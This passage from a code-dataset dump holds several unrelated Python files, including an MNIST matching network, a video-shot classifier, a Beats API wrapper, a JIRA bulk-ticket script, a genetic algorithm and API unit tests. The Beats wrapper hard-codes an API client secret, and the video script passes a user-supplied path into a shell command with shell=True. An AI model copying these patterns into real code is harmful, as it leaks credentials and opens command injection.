\"/\" + str(nClasses) + \"/\" + str(nImgsSuppClass) \n\n# Collecting sample both for query and for testing\ndef get_samples(mnistNum, nSupportImgs, testing = False):\n one_hot_list = [0.] * 10\n one_hot_list[mnistNum] = 1.\n samples = 0\n if not testing:\n imageNum = random.randint(0, mnist.train.images.shape[0] - 1)\n else:\n imageNum = random.randint(0, mnist.test.images.shape[0] - 1)\n pickedImages = []\n pickedLabels = []\n while samples < nSupportImgs:\n if (imageNum == len(mnist.train.images) and not testing):\n imageNum = 0\n elif (imageNum == len(mnist.test.images) and testing):\n imageNum = 0\n if not testing:\n labelThis = mnist.train.labels[imageNum, :]\n else:\n labelThis = mnist.test.labels[imageNum, :]\n if np.all(labelThis == one_hot_list):\n if not testing:\n imgReshape = np.reshape(mnist.train.images[imageNum,:], size)\n pickedLabels.append(mnist.train.labels[imageNum, :])\n else:\n imgReshape = np.reshape(mnist.test.images[imageNum,:], size)\n pickedLabels.append(mnist.test.labels[imageNum, :])\n pickedImages.append(imgReshape)\n samples += 1\n imageNum += 1\n return pickedImages, pickedLabels\n\n# Get several images\ndef get_support(test=False):\n supportImgs = []\n \n choices = numbers\n \n for support in choices:\n newSupportImgs, newSupportLabels = get_samples(support, nImgsSuppClass,\n test)\n supportImgs.append(newSupportImgs)\n \n return supportImgs\n\n# Get a single query value\ndef get_query(test=False):\n\n choices = numbers\n\n imageInd = random.randint(0, len(choices) - 1)\n imageNum = choices[imageInd]\n img, label = get_samples(imageNum, 1, test)\n l=np.zeros(len(choices))\n l[imageInd]=1\t\t\n return img[0], l\n\ntf.reset_default_graph()\n\n# Support information - matrix\n# Dimensions: batch size, n classes, n supp imgs / class\ns_imgs = tf.placeholder(tf.float32, [batchS, nClasses, nImgsSuppClass]+size)\n\n# Query Information - vector\nq_img = tf.placeholder(tf.float32, [batchS]+size) # batch size, size\n# batch size, number of categories\nq_label = tf.placeholder(tf.int32, [batchS, len(numbers)])\n\n# Network Function\n# Call for each support image (row of the support matrix) and for the query \n# image.\n\ndef create_network(img, size, First = False):\n currInp = img\n layer = 0\n currFilt = size[2]\n \n with tf.name_scope(\"run_network\"):\n for k in nKernels:\n with tf.variable_scope('conv'+str(layer), \n reuse=tf.AUTO_REUSE) as varscope:\n layer += 1\n weight = tf.get_variable('weight', [3,3,currFilt,k])\n currFilt = k\n if batch_norm:\n convR = tf.nn.conv2d(currInp, weight, strides=[1,1,1,1], padding=\"SAME\")\n beta = tf.get_variable('beta', [k], initializer = tf.constant_initializer(0.0))\n gamma = tf.get_variable('gamma', [k], initializer=tf.constant_initializer(1.0))\n mean, variance = tf.nn.moments(convR, [0,1,2])\n PostNormalized = tf.nn.batch_normalization(convR,mean,variance,beta,gamma,1e-10)\n reluR = tf.nn.relu(PostNormalized)\n else:\n bias = tf.get_variable('bias', [k], initializer = \n tf.constant_initializer(0.0))\n convR = tf.nn.conv2d(currInp, weight, strides=[1,1,1,1], padding=\"SAME\")\n convR = tf.add(convR, bias)\n reluR = tf.nn.relu(convR)\n poolR = tf.nn.max_pool(reluR, ksize=[1,poolS,poolS,1], \n strides=[1,poolS,poolS,1], padding=\"SAME\")\n currInp = poolR\n\n if dropout:\n currInp = tf.nn.dropout(currInp,0.8); \n return currInp\n\n# Call the network created above on the qury\nquery_features = create_network(q_img, size, First = True)\n\nsupport_list = []\nquery_list = []\n\n# Go through each class and each support image in 
that class\nfor k in range(nClasses):\n slist=[]\n qlist=[]\n for i in range(nImgsSuppClass):\n slist.append(create_network(s_imgs[:, k, i, :, :, :], size))\n qlist.append(query_features)\n slist = tf.stack(slist)\n qlist = tf.stack(qlist) \n support_list.append(slist)\n query_list.append(qlist)\n\n# Make a stack to compare the query to every support\nquery_repeat = tf.stack(query_list)\nsupports = tf.stack(support_list)\n\n# Loss\n# Cosine distance calculation \n# Application of softmax \n# Minimize loss\n\nwith tf.name_scope(\"loss\"):\n dotProduct = tf.reduce_sum(tf.multiply(query_repeat, supports), [3,4,5])\n supportsMagn = tf.sqrt(tf.reduce_sum(tf.square(supports), [3,4,5]))\n cosDist = dotProduct / tf.clip_by_value(supportsMagn, 1e-10, float(\"inf\"))\n \n cosDist = tf.transpose(cosDist,[2,0,1])\n\n # Find the average cosine distance per class\n MeanCosDist= tf.reduce_mean(cosDist,2)\n # Find the maximum cosine distance per class\n MaxCostDist = tf.reduce_max(cosDist,2)\n\n loss = tf.reduce_sum(tf.nn.softmax_cross_entropy_with_logits_v2(\n logits = MeanCosDist, labels = q_label))\n\n# Optimizer\nwith tf.name_scope(\"optimizer\"):\n optimizer = tf.train.AdamOptimizer(learning_rate).minimize(loss)\n\n# Accuracy and Equality Distribution\n\nwith tf.name_scope(\"accuracy\"):\n # Find the closest class\n max_class = tf.argmax(MaxCostDist, 1)\n # Find which class was supposed to be the closest\n max_label = tf.argmax(q_label, 1) \n \n # Compare the values\n total = tf.equal(max_class, max_label) \n # Find on average, how many were correct\n accuracy = tf.reduce_mean(tf.cast(total, tf.float32))\n\ndef get_next_batch(test = False):\n suppImgs = []\n suppLabels = []\n # Get support values for each batch \n for j in range(batchS):\n suppImgsOne = get_support(test)\n suppImgs.append(suppImgsOne)\n suppImgs = np.asarray(suppImgs)\n # Get query value for each batch\n queryImgBatch = []\n queryLabelBatch = []\n for i in range(batchS):\n qImg, qLabel = get_query(test)\n queryImgBatch.append(qImg)\n queryLabelBatch.append(qLabel)\n queryLabelBatch = np.asarray(queryLabelBatch)\n queryImgBatch = np.asarray(queryImgBatch)\n\n return suppImgs, suppLabels, queryImgBatch, queryLabelBatch\n\n# Session\n\n# Initialize the variables we start with\ninit = tf.global_variables_initializer()\n\nwith tf.Session() as session:\n session.run(init)\n \n # Create a save location\n Saver = tf.train.Saver()\n\n step = 1\n while step < nIt:\n step = step + 1\n\n suppImgs, suppLabels, queryImgBatch, queryLabelBatch = get_next_batch()\n \n # Run the session with the optimizer\n if tensorboard and step == 2:\n writer = tf.summary.FileWriter(LOG_DIR + \"/\" + str(step), session.graph)\n runOptions = tf.RunOptions(trace_level = tf.RunOptions.FULL_TRACE)\n run_metadata = tf.RunMetadata()\n ACC, LOSS, OPT = session.run([accuracy, loss, optimizer], feed_dict\n ={s_imgs: suppImgs, \n q_img: queryImgBatch,\n q_label: queryLabelBatch,\n }, options = runOptions, run_metadata=run_metadata)\n writer.add_run_metadata(run_metadata, 'step%d' % step)\n else:\n ACC, LOSS, OPT = session.run([accuracy, loss, optimizer], feed_dict\n ={s_imgs: suppImgs, \n q_img: queryImgBatch,\n q_label: queryLabelBatch,\n })\n \n # Observe Values\n if (step%100) == 0:\n print(\"ITER: \"+str(step))\n print(\"ACC: \"+str(ACC))\n print(\"LOSS: \"+str(LOSS))\n print(\"------------------------\")\n \n # Run an additional test set \n if (step % check) == 0:\n TotalAcc=0.0\n #run ten batches to test accuracy\n BatchToTest=10\n for repeat in range(BatchToTest):\n\n 
suppImgs, suppLabels, queryImgBatch, queryLabelBatch = get_next_batch(True)\n \n # Run session for test values\n ACC, LOSS = session.run([accuracy, loss], feed_dict\n ={s_imgs: suppImgs, \n q_img: queryImgBatch,\n q_label: queryLabelBatch,\n })\n TotalAcc += ACC\n print(\"Accuracy on the independent test set is: \"+str(TotalAcc/float(BatchToTest)) )\n \n # Save out the model once complete\n save_path = Saver.save(session, SAVE_PATH, step)\n print(\"Model saved in path: %s\" % SAVE_PATH)\n \n # Use the test set\n '''sumAcc = 0.0\n for k in range(0,100):\n # Get test support values \n suppImgs, suppLabels, queryImgBatch, queryLabelBatch = get_next_batch(True)\n\n a = session.run(accuracy, feed_dict = {s_imgs: suppImgs, \n q_img: queryImgBatch,\n q_label: queryLabelBatch\n })\n sumAcc += a\n \n print(\"Independent Test Set: \"+str(float(sumAcc)/100))'''\n","sub_path":"src/matching-network/mnist/mnist_matching_network_cosine.py","file_name":"mnist_matching_network_cosine.py","file_ext":"py","file_size_in_byte":10615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"139154670","text":"import sys\nimport os\nimport subprocess\n\nif(len(sys.argv) < 3):\n\tprint(\"Usage: python3 parse_video_info.py path_to_video mode\")\n\texit(1)\n\nvideo_ = sys.argv[1]\nfilename, _ = os.path.splitext(sys.argv[1])\nfile_ = filename+\"_faces.txt\"\nmode = sys.argv[2]\n\n\n#### UTILS FUNCTIONS\n# base and high of the two images\ndef area_ratio(b1, h1, b2, h2):\n\ta1 = b1*h1\n\ta2 = b2*h2\n\tif(a1 == 0 or a2 == 0):\n\t\treturn 0\n\tif(a1 > a2):\n\t\treturn a2/a1\n\treturn a1/a2\n\n\n\n# coordinates is an array of 4 points: (x_top, y_top, x_bottom, y_bottom)\ndef on_head(coordinates, h, n_split=3, h_ratio_limit=0.7):\n\tlower_limit_h = h/n_split\n\ty1_down = coordinates[3]\n\th_ratio = (coordinates[3]-coordinates[1])/(lower_limit_h)\n\treturn (y1_down <= lower_limit_h and h_ratio >= h_ratio_limit)\n\n# coordinates is an array of 4 points: (x_top, y_top, x_bottom, y_bottom)\n# b and h are the dimensions of th original frame\n# n_split is the number of \"split\" on which the frame will be divided into\n# large_split is to decide if we want only the center split, or to esclude only the first and last\ndef on_center(coordinates, b, h, n_split=3, large_split=True, h_ratio_limit=0.4):\n\tif large_split:\n\t\tupper_limit_h = h/n_split\n\t\tlower_limit_h = h*(n_split-1)/n_split\n\telse:\n\t\tif(n_split % 2 == 0):\n\t\t\tmid = n_split / 2\n\t\t\tupper_limit_h = h*(mid-1)/n_split\n\t\t\tlower_limit_h = h*(mid+1)/n_split\n\t\telse:\n\t\t\tmid = n_split // 2\n\t\t\tupper_limit_h = h*mid/n_split\n\t\t\tlower_limit_h = h*(mid+1)/n_split\n\th_ratio = (coordinates[3]-coordinates[1])/(lower_limit_h-upper_limit_h)\n\treturn (coordinates[1] >= upper_limit_h and coordinates[3] <= lower_limit_h and h_ratio >= h_ratio_limit)\n\n\n\n#### MAIN ###\n\n# read video dimensions first\ncmd_ = \"./get_video_info.sh \"+video_\np = subprocess.Popen(cmd_ , shell=True, universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\nstdout, stderr = p.communicate()\ndim = stdout.strip().split(\"\\n\") # dim[0] = b, dim[1] = h\n\n# parse input file\nframes = {}\nwith open(file_, \"r\") as f:\n\tfor line in f:\n\t\twords = line.split()\n\t\tframe = int(words[0])\n\t\tx_top = int(words[1])\n\t\t#if(x_top < 0): x_top = 0\n\t\ty_top = int(words[2])\n\t\t#if(y_top < 0): y_top = 0\n\t\tx_down = int(words[3])\n\t\t#if(x_down > int(dim[0])): x_down = int(dim[0])\n\t\ty_down = 
int(words[4])\n\t\t#if(y_down > int(dim[1])): y_down = int(dim[1])\n\t\t\n\t\tif frame not in frames.keys():\n\t\t\tframes[frame] = [(x_top, y_top, x_down, y_down)]\n\t\telse:\n\t\t\tframes[frame].append((x_top, y_top, x_down, y_down))\n\nold_key = -1\nfrms = {'plan_moyen':[], 'plan_rapproche':[], 'plan_americain':[], 'gros_plan':[], 'plan_large':[], 'other':[], 'unknown':[i for i in range(int(dim[2])) if i not in frames.keys() and i % 25 == 0]}\nfor key, value in sorted(frames.items()):\n\tif(old_key == -1): old_key = key\n\telif(key < old_key+20): continue\n\tif(len(value) == 1):\n\t\tcoordinates = value[0]\n\t\tratio = area_ratio(abs(coordinates[2]-coordinates[0]), abs(coordinates[1]-coordinates[3]), int(dim[0]), int(dim[1]))\n\t\t# GROS PLAN\n\t\tif ratio > 0.135:\n\t\t\tfrms['gros_plan'].append(key)\n\t\t# PLAN MOYEN (0.006 0.01) -> 0 < h < 154\n\t\telif ratio > 0.006 and ratio < 0.0068 and coordinates[3] < 384-250 and coordinates[3] > 384-340:\n\t\t\tfrms['plan_moyen'].append(key)\n\t\t# PLAN RAPPROCHE (0.03 and 0.08) -> 164 < h < 254\n\t\telif ratio > 0.05 and ratio < 0.06 and coordinates[3] < 384-130 and coordinates[3] > 384-220:\n\t\t\tfrms['plan_rapproche'].append(key)\n\t\t# PLAN AMERICAIN (0.01 and 0.03) -> \n\t\t#elif ratio > 0.02 and ratio < 0.027 and coordinates[3] < 384-160:# and coordinates[3] > 384-220:\n\t\t#\tfrms['plan_americain'].append(key)\n\t\t# PLAN LARGE (0 and 0.006)\n\t\t#elif ratio < 0.006 and ratio >= 0:\n\t\t#\tfrms['plan_large'].append(key)\n\t\telse:\n\t\t\tfrms['other'].append(key)\n\t\t\tcontinue #if not chosen, do not update key\n\telse:\n\t\t#coordinates = value[0]\n\t\t#ratio = area_ratio(abs(coordinates[2]-coordinates[0]), abs(coordinates[1]-coordinates[3]), int(dim[0]), int(dim[1]))\n\t\t#if ratio >= 0 and ratio < 0.006:\n\t\t#\tfrms['plan_large'].append(key)\n\t\tfrms['other'].append(key)\n\t\t\n\told_key = key\nprint(\" \".join(str(x) for x in frms[mode]))\n","sub_path":"parse_video_info.py","file_name":"parse_video_info.py","file_ext":"py","file_size_in_byte":4038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"111146925","text":"from pybeats.api import BeatsAPI\nfrom pybeats.model import Collection,SearchResult,LoggedInUser\nimport json\n\nCLIENT_ID = \"7fw6kmzz8qb4pt8g6zg7ud6x\"\nCLIENT_SECRET = \"JvRD23GQDVbCxGPaBvDNeM9a\"\n\n# USERNAME = \"your-beats-username\"\n# PASSWORD = \"your-beats-password\"\n\n# set up your api instance\napi = BeatsAPI(client_id=CLIENT_ID, client_secret=CLIENT_SECRET)\n\n\n#searching\ndef search_beats(the_query):\n\tsearch_results = api.get_predictive_search_results(the_query)\n\tfor result in search_results['data']:\n\t\treturn json.dumps(search_results['data'])\n\n\tget_audio(result['id'])\n\n#search and only return track\ndef search_tr(tq):\n\tresp = api.get_search_results(query=tq, search_type='track')\n\tfor result in resp['data']:\n\t\treturn json.dumps(resp['data'])\n\n\ndef get_audio(track_id):\n\taudio_results = api.get_audio_asset(track_id)\n\treturn audio_results\n","sub_path":"app/beats_api.py","file_name":"beats_api.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"158517107","text":"# -*- coding: utf-8 -*-\nimport pandas as pd \nimport os \nfrom shutil import copyfile\ncsv_file_name = input('input xception csv kmeans : ')\ndata = pd.read_csv(csv_file_name)\ndata = data.drop(['xception','Unnamed: 0'],axis=1)\ndata = 
data.sort_values(by=['cluster'])\n\n\nfor row in data.iterrows():\n    path = os.path.join(\"clusters/{}\".format(row[1][1]))\n    print(path)\n    if not os.path.exists(path):\n        os.mkdir(path)\n        print(path,'created')\n    \n    if os.path.exists(path):\n        print(path + ' : exists')\n        dst = path+'/'+row[1][0].split('/')[-1]\n        copyfile(row[1][0], dst)\n","sub_path":"xception/results_to_dir.py","file_name":"results_to_dir.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}{"seq_id":"341375886","text":"from __future__ import print_function\nimport jira.client\nfrom jira.client import JIRA\nfrom jira import JIRA, JIRAError\nimport dateutil.parser\nfrom datetime import datetime, timedelta\nimport time\nimport csv\nimport pyodbc\nimport sys\nimport logging\nimport config\nimport re\n\nimport pprint\n\n#Get 3 inputs from the user: client, name, source\n#Alternatively, this can also be pulled from the order form, but have a check in the middle for a user to confirm\n\nLOG_FILENAME = 'JIRA_BUlkUploadCR.log'\nlogging.basicConfig(filename=LOG_FILENAME,level=logging.DEBUG)\n\nlogging.debug('This message should go to the log file')\nclient='MODA'\ncrname='Test Change Req v9'\ncontext='Sample context...'\nsource='MCHD'\nehr='Custom or Unknown'\nimpround='InitialBuild'\nbuildtype='Analytics Implementation:951'\n\n\n\nreload(sys)\nsys.setdefaultencoding('utf-8')\ncnxn = pyodbc.connect('DRIVER={SQL Server};SERVER=QDWSQLOPS01;DATABASE=AnalyticsMonitoring;Trusted_Connection=TRUE')\ncursor = cnxn.cursor()\n\noptions = {'server': 'https://jira.arcadiasolutions.com'}\njira = JIRA(options, basic_auth=(config.username, config.password))\n\nrecent_issue = jira.search_issues(\n    \"reporter = dinesh.jayapathy and summary~'Initial Build Kick off' ORDER BY createdDate DESC\",\n    maxResults=2)\n\n# recentcount=0\nfor issueq in recent_issue:\n    # if recentcount==0:\n\n    try:\n        exidraw = issueq.fields.customfield_11005\n    except:\n        exidraw = None\n    # recentcount+=1\n\nprint('this is the recent exidraw: ' + str(exidraw))\n\nif exidraw is not None:\n    # exid=re.match('^[^\\d]*(\\d+)',exidraw,1)\n    p = re.match(r'^[^\\d]*(\\d+)', exidraw)\n    exid = p.group(1)\n    print('this is the exid ' + str(exid))\n\nelse:\n    print('Exid is empty: ' + str(exidraw))\n\ncursor.execute(\n    \"\"\"\n    select Client_Acronym, Data_Source_Acronym,Important_Context,Arcadia_Implementation_Lead_Email_Address,id \n    , CASE WHEN Arcadia_Implementation_Type LIKE '%Direct Feed%' THEN 'Direct Feed'\n    WHEN [Data_Extraction_Connection_Type] LIKE '%Flat File%' THEN 'Flat File'\n    WHEN Source_System_Software NOT LIKE '%Flat File%' AND Source_System_Software NOT LIKE '%Other%' THEN Source_System_Software\n    ELSE 'Custom or Unknown' END AS EHR\n    ,TRY_CONVERT(date,insert_timestamp)\n    \n    from ARC_OrderFormValues where ID in ('211')\n    \"\"\")\n\norderform = cursor.fetchall()\n\n\n\nfor i in orderform:\n\n    exid = int(exid)+1\n    # print (c,i)\n    client = i[0]\n    source = i[1]\n    context = 'Test description. 
Will come from excel template later on.'\n    email = i[3]\n    idO = i[4]\n    ehr = i[5]\n    impround = 'Initial Build'\n    buildtype = 'Analytics Implementation:951'\n    print(exid, client, source, context, email, idO)\n\n    watcher = 'dinesh.jayapathy@arcadiasolutions.com'\n    watcher = watcher.replace('@arcadiasolutions.com', '')\n    # watcher=email.replace('@arcadiasolutions.com','')\n\n\n    issue_list = [\n\n        # {\n        #     'project': {'key': 'AAI'},\n        #\n        #     'summary': client+' '+source+' '+ehr+' '+impround,#\n        #\n        #     'customfield_11601': {'value': client}, #this is client\n        #     'customfield_11609': {'value': source },#this is the data source. It should be an existing value. Else it will error out. Works now\n        #     'customfield_11626':impround, #this is impround field\n        #     'description':context,\n        #     'issuetype': {'name': 'Epic'},\n        #     'customfield_11618':{'value':'Custom or Unknown'},\n        #     'customfield_11630': {'value': 'Unknown'},  # customer contract id. Mandatory for all new tickets.\n        #     'customfield_10301': client+' '+source+' '+ehr+' '+impround, # Epic name. Mandatory field. For all new tickets.\n        #     'assignee': {'name': watcher},\n        # },\n\n        {  # story gets created with this setup. ClientName field causes issue in upload.\n            'project': {'key': 'AAI'},\n            # 'projectname': 'Arcadia Analytics Implementation',\n            'summary': client + ' ' + source + ' ' + ehr + ' ' + impround + ' Kick off',  #\n\n            # 'customfield_11601': client, #this is client. This is causing issue.\n            'customfield_11603': {'value': 'Kick off'},\n            'customfield_11609': {'value': source},  # this is the data source.\n            # 'customfield_11626':{'value':impround}, #this is impround field. This is causing issue in upload.\n            'description': context,\n            'issuetype': {'name': 'Story'},\n            'customfield_11618': {'value': ehr},\n            'customfield_11630': {'value': 'Unknown'},  # customer contract id. Mandatory for all new tickets.\n            # 'customfield_10301': client+' '+source+' '+ehr+' '+impround, # Epic name. Mandatory field. For all new tickets.\n            'assignee': {'name': watcher},\n            # 'customfield_10300': issueEpic,\n            'customfield_11005': str(exid)+str(client)+str(source)+str(ehr)+str(impround)+'Kick off' #this is the issue id; it has to have a proper exid\n            # You can pull the exid from JIRA. Run a JQL to pull the most recent Kick off ticket uploaded by DJ. Pull the exid from that, increment it and assign it to the variable exid. For each ticket it gets incremented.\n            # add epic link field after checking . Add this to story\n\n            # this is a sample issue id . The first part is exid which has to be unique\n            # customfield_11005': u'1604CCC NEWHOther | v. 
0Initial BuildKick off',\n        }\n\n    ]\n\n    pprint.pprint(issue_list)\n    try:\n\n        issues = jira.create_issues(field_list=issue_list)\n        print('These are the created issues :' + str(issues))\n\n\n\n\n    except Exception as e:\n\n        if 'EXIST' in e.message:\n            print('The issue does not exist')\n\n\n            exit(1)\n        else:\n            print(e)","sub_path":"Projects/tet2.py","file_name":"tet2.py","file_ext":"py","file_size_in_byte":5846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}{"seq_id":"78073036","text":"from numpy import array, random\n\nfrom neural import NeuralNetwork\n\n\nclass Individual:\n    \"\"\" defines individual of a population \"\"\"\n    def __init__(self, layers=None, weights=None):\n        self.score = 0\n        # creating new random object\n        if weights is None:\n            self.nn = NeuralNetwork(layers=layers)\n        # mutation\n        else:\n            self.nn = NeuralNetwork(layers=layers, weights=weights)\n    \n    def find_fitness(self):\n        return self.score\n    \n    def reset(self):\n        \"\"\" used during evolution of population \"\"\"\n        self.score = 0\n\nclass Population:\n    \"\"\" defines functions related to population of genetic algorithm \"\"\"\n    def __init__(self, pop_size=1000, mutate_prob=0.03, retain_unfit_prob=0.01, select=0.333, layers=None):\n        self.pop_size = pop_size # number of individuals in the population\n        self.mutate_prob = mutate_prob # probability that a gene is mutated \n        self.retain_unfit_prob = retain_unfit_prob # probability of retaining unfit individuals\n        self.select = select # fraction of fittest population being selected\n        self.layers = layers # layers used in neural network\n        self.fitness_history = [] # stores fitness values for each generation\n\n        self.generation = 1 # holds current generation number\n        # population initialization\n        self.individuals = [Individual(layers=layers) for i in range(self.pop_size)] \n    \n    def grade(self):\n        \"\"\" finds population fitness \"\"\"\n        self.pop_fitness = max([i.find_fitness() for i in self.individuals])\n        self.fitness_history.append(self.pop_fitness)\n    \n    def select_parents(self):\n        \"\"\" selects the fittest parents, with a few of the unfittest as well \"\"\"\n        self.individuals = sorted(self.individuals, key=lambda i: i.find_fitness(), reverse=True)\n        # selecting fittest parents\n        parents_selected = int(self.select * self.pop_size)\n        self.parents = self.individuals[:parents_selected]\n        # including some unfittest parents\n        unfittest = self.individuals[parents_selected:]\n        for i in unfittest:\n            if self.retain_unfit_prob > random.rand():\n                self.parents.append(i)\n        \n        # reset properties of parents\n        for individual in self.parents:\n            individual.reset()\n\n    \n    def crossover(self, weights1, weights2):\n        \"\"\" combines the genes of two parents to form the genes of a child \"\"\"\n        weights = []\n\n        for w1, w2 in zip(weights1, weights2):\n            w = []\n            for column1, column2 in zip(w1, w2):\n                column = []\n                for theta1, theta2 in zip(column1, column2):\n                    # selecting randomly from father or mother genes\n                    choosen = random.choice((theta1, theta2)) \n                    column.append(choosen)\n                w.append(column)\n            weights.append(array(w))\n        return weights\n\n    def breed(self):\n        \"\"\" creates new children for populating the population using fittest parents \"\"\"\n        children_size = self.pop_size - len(self.parents)\n        children = []\n        if len(self.parents) > 0:\n            while len(children) < children_size:\n                father = random.choice(self.parents)\n                mother = random.choice(self.parents)\n                if father != mother:\n                    child_weights = self.crossover(father.nn.weights, mother.nn.weights)\n                    child = 
Individual(layers=self.layers, weights=child_weights)\n                    children.append(child)\n        \n        self.individuals = self.parents + children\n\n    def evolve(self):\n        \"\"\" define process of evolution \"\"\"\n        self.grade()\n        self.select_parents()\n        self.breed()\n\n        print(f'{self.generation} --> {self.fitness_history[-1]}') \n        self.generation += 1","sub_path":"genetic.py","file_name":"genetic.py","file_ext":"py","file_size_in_byte":4020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}{"seq_id":"645026288","text":"import math\n\nfrom ..data_structures.source_shared import SourceVector\n\n\ndef convert_rotation_matrix_to_degrees(m0, m1, m2, m3, m4, m5, m8):\n    angle_y = -math.asin(round(m2, 6))\n    c = math.cos(angle_y)\n    if abs(c) > 0.005:\n        translate_x = m8 / c\n        translate_y = -m5 / c\n        angle_x = (math.atan2(translate_y, translate_x))\n        translate_x = m0 / c\n        translate_y = -m1 / c\n        angle_z = (math.atan2(translate_y, translate_x))\n    else:\n        angle_x = 0\n        translate_x = m4\n        translate_y = m3\n        angle_z = (math.atan2(translate_y, translate_x))\n    return angle_x, angle_y, angle_z\n\ndef vector_i_transform(input: SourceVector,\n                       matrix_c0: SourceVector, \n                       matrix_c1: SourceVector,\n                       matrix_c2: SourceVector,\n                       matrix_c3: SourceVector):\n    temp = SourceVector()\n    output = SourceVector()\n\n    temp.x = input.x - matrix_c3.x\n    temp.y = input.y - matrix_c3.y\n    temp.z = input.z - matrix_c3.z\n\n    output.x = temp.x * matrix_c0.x + temp.y * matrix_c0.y + temp.z * matrix_c0.z\n    output.y = temp.x * matrix_c1.x + temp.y * matrix_c1.y + temp.z * matrix_c1.z\n    output.z = temp.x * matrix_c2.x + temp.y * matrix_c2.y + temp.z * matrix_c2.z\n\n    return output\n","sub_path":"All_In_One/addons/SourceIO/utilities/math_utilities.py","file_name":"math_utilities.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}{"seq_id":"335086521","text":"import json\nimport unittest\nimport warnings\n\nfrom parameterized import parameterized\n\nfrom data.Get_TestData.Get_D1_AM_Data import Get_SM_TestData\nfrom lib.D1_UserList_Action import UL_Action\nfrom tools.service import Service\nfrom tools.util import Utility\n\nclass AM_Test(unittest.TestCase):\n\n    def setUp(self) -> None:\n        Utility.initialize_DB()\n        warnings.simplefilter('ignore', ResourceWarning)\n        self.ul = UL_Action(Service.get_session_tm())\n\n    # Query actors\n    @parameterized.expand(Get_SM_TestData.get_login_excel_data_query_actor(1))\n    def test_SurroundingMall_query_actor(self, url, res_method, cases_name, expected):\n        edit_data = {\"CASENAME\": cases_name, \"URL\": url, \"METHOD\": res_method, \"EXPECTED\": expected}\n        result = self.ul.doGet(edit_data['URL'])\n\n        if edit_data['CASENAME'] == \"查询存在的电影名\":\n            if edit_data['METHOD'] == \"GET\":\n                actual = str(json.loads(result)['count'])\n\n        elif edit_data['CASENAME'] == \"查询不存在的电影名\":\n            if edit_data['METHOD'] == \"GET\":\n                actual = str(json.loads(result)['count'])\n\n        elif edit_data['CASENAME'] == \"查询不存在的page\":\n            if edit_data['METHOD'] == \"GET\":\n                actual = str(json.loads(result)['count'])\n\n        else:\n            edit_data['CASENAME'] = '用例名错误'\n\n        Utility.logger(edit_data['CASENAME'], actual, actual, expected)\n        self.assertEqual(actual, edit_data['EXPECTED'])\n\n    # Delete cast members\n    @parameterized.expand(Get_SM_TestData.get_login_excel_data_delete_actor(1))\n    def test_SurroundingMall_delete_actor(self, url, res_method, cases_name, expected):\n        delete_data = {\"CASENAME\": cases_name, \"URL\": url, \"METHOD\": res_method, \"EXPECTED\": expected}\n        result = self.ul.doDelete(delete_data['URL'])\n        if delete_data['CASENAME'] == \"删除存在的演职人员ID\":\n            if delete_data['METHOD'] == \"DELETE\":\n                actual = json.loads(result)['msg']\n\n        elif delete_data['CASENAME'] == \"删除不存在的演职人员ID\":\n            if delete_data['METHOD'] == \"DELETE\":\n                actual = json.loads(result)['msg']\n\n        else:\n            delete_data['CASENAME'] = '用例名错误'\n\n        Utility.logger(delete_data['CASENAME'], actual, actual, expected)\n        self.assertEqual(actual, delete_data['EXPECTED'])\n\n    # Add cast members\n    @parameterized.expand(Get_SM_TestData.get_login_excel_data_add_actor(1))\n    def test_SurroundingMall_add_actor(self, url, res_method, mid, realName, actorType, role, actorPic, cases_name,\n                                       expected):\n        add_data = {\"CASENAME\": cases_name, \"URL\": url, \"METHOD\": res_method,\n                    \"DATA\": {\"mid\": mid, \"realName\": realName, \"actorType\": actorType, \"role\": role,\n                             \"actorPic\": actorPic}, \"EXPECTED\": expected}\n\n        actual = \"\"\n        if add_data['CASENAME'] == \"添加演职人员ID\":\n            if add_data['METHOD'] == \"POST\":\n                result = self.ul.doPost(add_data['URL'], add_data['DATA'])\n                actual = json.loads(result)['msg']\n\n        elif add_data['CASENAME'] == \"添加不存在的演职人员ID\":\n            if add_data['METHOD'] == \"DELETE\":\n                result = self.ul.doPost(add_data['URL'], add_data['DATA'])\n                actual = json.loads(result)['msg']\n\n        elif add_data['CASENAME'] == \"添加重复的演职人员ID\":\n            if add_data['METHOD'] == \"POST\":\n                result = self.ul.doPost(add_data['URL'], add_data['DATA'])\n                actual = json.loads(result)['msg']\n        else:\n            add_data['CASENAME'] = '用例名错误'\n        Utility.logger(add_data['CASENAME'], actual, actual, expected)\n        self.assertEqual(actual, add_data['EXPECTED'])\n\n\n\nif __name__ == '__main__':\n    unittest.main()","sub_path":"2.Travel_Request/cases/D1_ActorManagement_Test.py","file_name":"D1_ActorManagement_Test.py","file_ext":"py","file_size_in_byte":3917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}{"seq_id":"591628783","text":"#!/usr/bin/env python\n\"\"\"\n_User.GetAssociation_\n\nRetrieve a user/group association\n\n\"\"\"\n\n\n\n\nfrom WMCore.Database.DBFormatter import DBFormatter\n\n\nclass GetAssociation(DBFormatter):\n    \"\"\"\n    _GetAssociation_\n\n    Get the associations between a requestor and groups given the\n    requestor DB id.\n    A list of group IDs is returned.\n\n    \"\"\"\n\n    def execute(self, requestorId, conn = None, trans = False):\n        \"\"\"\n        _execute_\n\n\n\n        \"\"\"\n        self.sql = \"SELECT group_id FROM reqmgr_group_association \"\n        self.sql += \" WHERE requestor_id = :requestor_id\"\n        binds = {\"requestor_id\": requestorId}\n        result = self.dbi.processData(self.sql, binds,\n                                      conn = conn, transaction = trans)\n        values = [ x[0] for x in self.format(result)]\n        return values\n","sub_path":"src/python/WMCore/RequestManager/RequestDB/MySQL/Requestor/GetAssociation.py","file_name":"GetAssociation.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}{"seq_id":"269497314","text":"from system.models import 